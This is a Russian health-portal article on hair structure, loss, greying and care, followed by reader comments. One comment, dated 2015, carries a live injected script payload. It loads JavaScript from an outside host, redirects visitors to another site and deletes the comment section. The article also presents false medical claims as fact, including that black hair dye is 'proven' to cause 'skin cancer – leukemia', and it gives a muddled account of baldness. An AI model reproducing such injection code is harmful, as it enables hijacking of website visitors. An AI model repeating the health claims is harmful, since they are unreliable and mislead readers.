Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ты: инструкция к применен...  >>  Ты: инструкция к применению. Волосы
 
Обратная связь
 

Ты: инструкция к применению. Волосы

Размер шрифта
25 марта 2012 10:00
  • google_analytics: false
  • Нравится

Ногти и волосы даны человеку для того, чтобы доставить ему постоянное занятие, так считал Козьма Прутков. И он был прав – волосы, так же, как и другие органы нашего тела, требуют регулярной заботы. Как ухаживать за волосами, чтобы они были здоровыми?

1

Первые волосы у плода появляются на третьем месяце внутриутробного развития. Ученые подсчитали, что в норме на голове взрослых людей должно находится около 150 000 волос. Причем это самая быстрорастущая часть защитного покрова нашего тела: каждый месяц они увеличиваются в длине на 1-2 см. Средняя продолжительность жизни каждого волоса на голове равна примерно 7 годам. Спустя это время он выпадает и на его месте вырастает новый волос. Таким образом ежедневно мы теряем около 100 волос.

Строение волос

Часть волоса, свободно расположенная над кожей, называется стержнем, а та часть, которая скрыта в коже – корнем волоса.

Стержень волоса состоит из трех слоев.

  • Сердцевина волоса, которая называется мозговым веществом, в ней содержатся ороговевшие клетки.
  • Основную массу волоса составляет его корковое вещество, состоящее из вытянутых, плотно прилегающих друг к другу клеток с удлиненным ядром, содержащих пигмент, от которого зависит цвет волос человека. Пигмент может быть рыжим, желтым и черным, а их сочетания создают широкое разнообразие цвета волос у людей. При отсутствии пигмента волосы выглядят белыми.
  • Наружный слой волоса – кутикула, или кожица, – представлен плоскими безъядерными ороговевшими клетками, которые располагаясь в один слой, находят друг на друга наподобие черепицы.

Корневая часть волоса расположена в волосяном мешочке (folliculus pili), открывающемся на коже небольшим расширением (ostium). В кожный фолликул впадает выводной проток сальной железы.

Главные функции

  • Сохранение тепла. Волосы создают воздушную прослойку, в которой сохраняется тепло.
  • Снижение трения, возникающего при движении рук и ног. Например в подмышечной области волосы защищают нежную кожу от раздражения при движении рук и трении кожи.
  • Считается, что предкам человека волосяные мышцы, поднимая волосы на всем теле, помогали казаться больше и страшнее. Поднятие волос на теле – прием устрашения противника в древности (атавизм).

В норме у каждого волоса есть фолликул с рецепторами, на которые прикрепляются гормоны и поэтому растут волосы.

Что убивает волосы

12% мужского населения земли – лысые люди. Облысение вызвает избыток дигидротестостерона (DHT) – мужского полового гормона, который отвечает за рост волос. Все происходит внутри волосяного фолликула. Когда дегидротестостерон вступает во взаимодействие с рецепторами, это вызывает активацию иммунной системы, которая воспринимает комплекс дегидротестостерон-рецептор, как чужеродное вещество и атакует его. Это приводит к уничтожению фолликула и, как следствие, – волоса: фолликул волоса подвергается дистрофии (уменьшается), уменьшается и толщина стержня волоса. Процесс этот происходит до тех пор, пока все волосы не начнут напоминать пушок, а потом и совсем не исчезнут.

  • Седина

Фолликулы содержат специальный пигмент, который окрашивает волосы – меланин. Это то же вещество, которое делает цвет нашей кожи более светлым или более темным.

С возрастом уровень вырабатываемого пигмента в наших волосяных фолликулах постепенно снижается. Чем старше человек, тем меньше производится меланина. С уменьшением пигмента цвет волос становится более светлым - серым, серебряным и совсем белым.

  • Окрашивание черной краской

Доказано: черная краска вызывает рак кожи – лейкемию.

1

Как ухаживать за волосами

  • Мытье волос

В норме кожа головы покрыта водно-жировой эмульсией – это защитная пленка для волос. Обычный шампунь содержит щелочь, которая разрушает водно-жировой слой на коже и сушит волосы.

Что делать

Мойте голову шампунем с низким содержанием щелочи, с пометкой РН-нейтральный, но даже в случае качественного шампуня мойте голову не каждый день.

  • Правильное питание

Витамин D необходим для здоровья кожи, а значит, и для здоровья волос, он и незаменимые омега-3 ПНЖК, регулирующие жировой баланс в организме, есть в жире морской рыбы.

Что делать

Употребляйте продукты с высоким содержанием омега-3 полиненасыщенных жирных кислот (красная жирная рыба), а также специальные препараты в составе которых есть рыбий жир, например «Рыбий жир в капсулах».

Волосы это не только часть облика человека, украшающая его, но и верный индикатор его здоровья. Это доказывает тесную связь нашего здоровья и внешней красоты. Берегите себя – заботьтесь о своем здоровье и вы сохраните красоту своих волос.

 

Посмотрите слайдшоу «Что такое волосы человека»

Пройдите тест «Как устроены волосы человека?»

Сюжеты по теме:
Ты: инструкция к применению. Волосы

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

26 марта 2012 в 11:05

Цитировать   |   Пожаловаться

Вы пишете, что важной функцией волос является "Снижение трения, возникающего при движении рук и ног. Например вподмышечной области волосы защищают нежную кожу от раздражения придвижении рук и трении кожи."
Это совсем не так. Подмышками и на гениталиях и лобке (а не в паху, если пахом точнее называтьскладку кожи между ногой и телом) волосы, являются атавизмом,поскольку, как у животных (а человек не далеко от них ушел) служат длялучшего распространения запахов тела, индивидуальных для каждогосущества. Волосы, как известно, прекрасно впитывают и долго удерживаютзапахи!

2 - Гость

26 марта 2012 в 11:16

Цитировать   |   Пожаловаться

точно, хоть в википедии посмотрите: даже там есть паховая область (на рисунке показано), а есть лобковая. Так в паху не растут в изобилии волосы, а только на лобке, они и называются "лобковые"! Ну что это за медик, такую чушь с экрана нести!

Гость 26 марта 2012 в 11:16
хоть в википедии посмотрите
 Спасибо за внимание к нашим материалам, ценные уточнения. 

4 - Гость

29 мая 2012 в 11:11

Цитировать   |   Пожаловаться

Подскажите,есть-ли возможность остановить появление седых волос,методом традиционои медицыны(народнои-не доверяю)

Кроме общих рекомендаций - здорового образа жизни, полноценного и сбалансированного питания, занятий спортом, отсутствия вредных привычек, и.т.д - нет Обмен пигмента - часть основного обмена, никак отдельно не управляется.

6 - zzzzzz

30 июня 2015 в 23:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что волосы говорят о здоровье   Лекарства от выпадения волос   Лечение выпадения волос   Типы выпадения волос  
03 декабря 2012Лекарство от глаукомы помогает при облысении 25 июня 2013Компании, производящие краски для волос, разоряются! Изобретено лекарство против седины
 
14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
Супереда для волос
Причины выпадения волос
Что с моими волосами?

Тесты

Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.